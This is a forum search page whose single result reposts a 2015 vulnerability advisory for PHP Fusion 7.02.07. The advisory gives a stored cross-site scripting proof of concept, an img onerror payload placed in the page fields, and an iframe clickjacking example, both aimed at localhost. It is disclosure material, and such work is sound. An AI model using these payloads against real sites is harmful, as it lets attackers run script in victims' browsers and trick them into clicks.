Jump to content

Search the Community

Showing results for tags '#tested'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. Hi Team, #Affected Vendor: https://www.php-fusion.co.uk/home.php #Date: 04/05/2015 #Creditee: http://osvdb.org/creditees/13518-vadodil-joel-varghese #Type of vulnerability: Persistent XSS + Clickjacking #Tested on: Windows 8.1 #Product: PHP Fusion #Version: 7.02.07 #1 Cross Site Scripting x-x-x-x-x-x-x-x-x-x-x-x- #Tested Link: http://localhost/PHPfusion/files/administration/custom_pages.php?aid=68bca08161175b0e #Description: PHP Fusion is vulnerable to stored cross site scriting vulnerability as the parameter "page_content" is vulnerable which will lead to its compromise. #Proof of Concept (PoC): page_title=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%27%29%22%2F%3E&page_access=0&page_content=%22%3E%3Cimg+src%3D%22blah.jpg%22+onerror%3D%22alert%28%27pWnEd%21%21%27%29%22%2F%3E&add_link=1&page_comments=1&page_ratings=1&save=Save+Page #2 UI redress attack x-x-x-x-x-x-x-x-x-x-x #Tested Link: http://localhost/PHPfusion/files/viewpage.php?page_id=5 #Description: PHP Fusion is vulnerable to UI redress attack as multiple transparent or opaque layers can be used to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. #Proof of Concept (PoC): <iframe src=" http://localhost/PHPfusion/files/viewpage.php?page_id=5" sanboxed width=900 height=900> Please check me out !!!! </iframe> -- Regards, *Joel V* Source
×
×
  • Create New...